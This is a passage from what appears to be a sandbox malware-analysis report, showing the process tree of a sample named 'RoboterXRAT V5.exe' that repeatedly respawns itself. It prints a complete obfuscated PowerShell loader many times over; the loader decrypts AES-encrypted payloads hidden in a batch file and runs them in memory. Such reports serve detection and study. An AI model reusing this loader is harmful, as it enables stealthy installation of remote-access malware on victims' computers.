$bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));21⤵
- Command and Scripting Interpreter: PowerShell
PID:5272
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"20⤵PID:2708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "19⤵PID:5932
-
C:\Windows\system32\net.exenet file20⤵PID:1580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file21⤵PID:2104
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));20⤵
- Command and Scripting Interpreter: PowerShell
PID:5648
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"19⤵PID:1276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "18⤵PID:5632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵PID:2736
-
-
C:\Windows\system32\net.exenet file19⤵PID:3276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file20⤵PID:5652
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));19⤵
- Command and Scripting Interpreter: PowerShell
PID:6088
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"18⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "17⤵PID:2380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
- Suspicious use of SetWindowsHookEx
PID:1332
-
-
C:\Windows\system32\net.exenet file18⤵PID:204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file19⤵PID:5272
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));18⤵
- Command and Scripting Interpreter: PowerShell
PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"17⤵PID:5988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "16⤵PID:5980
-
C:\Windows\system32\net.exenet file17⤵PID:5556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file18⤵PID:360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));17⤵
- Command and Scripting Interpreter: PowerShell
PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"16⤵
- Loads dropped DLL
PID:1828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "15⤵PID:6120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Suspicious use of SetWindowsHookEx
PID:5732
-
-
C:\Windows\system32\net.exenet file16⤵PID:5932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file17⤵PID:5572
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));16⤵
- Command and Scripting Interpreter: PowerShell
PID:5008
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"15⤵PID:8
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "14⤵PID:684
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Suspicious use of SetWindowsHookEx
PID:4668
-
-
C:\Windows\system32\net.exenet file15⤵PID:5608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file16⤵PID:5728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));15⤵
- Command and Scripting Interpreter: PowerShell
PID:5092
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"14⤵PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "13⤵PID:3040
-
C:\Windows\system32\net.exenet file14⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file15⤵PID:360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));14⤵
- Command and Scripting Interpreter: PowerShell
PID:824
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"13⤵PID:3228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "12⤵PID:4356
-
C:\Windows\system32\net.exenet file13⤵PID:872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file14⤵PID:4228
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));13⤵
- Command and Scripting Interpreter: PowerShell
PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"12⤵
- Executes dropped EXE
PID:3616 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"13⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"14⤵PID:2472
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"15⤵PID:2420
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"16⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"17⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"18⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"19⤵PID:5220
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"20⤵PID:4584
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"21⤵PID:4876
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"22⤵PID:4156
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"23⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"24⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"25⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"26⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"27⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"28⤵PID:4292
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"29⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"30⤵PID:1328
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"31⤵PID:4380
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"32⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"33⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"34⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"35⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"36⤵PID:1732
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"37⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"38⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"39⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"40⤵PID:5504
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"41⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"42⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"43⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"44⤵PID:8
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"45⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"46⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"47⤵PID:808
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"48⤵PID:4956
-
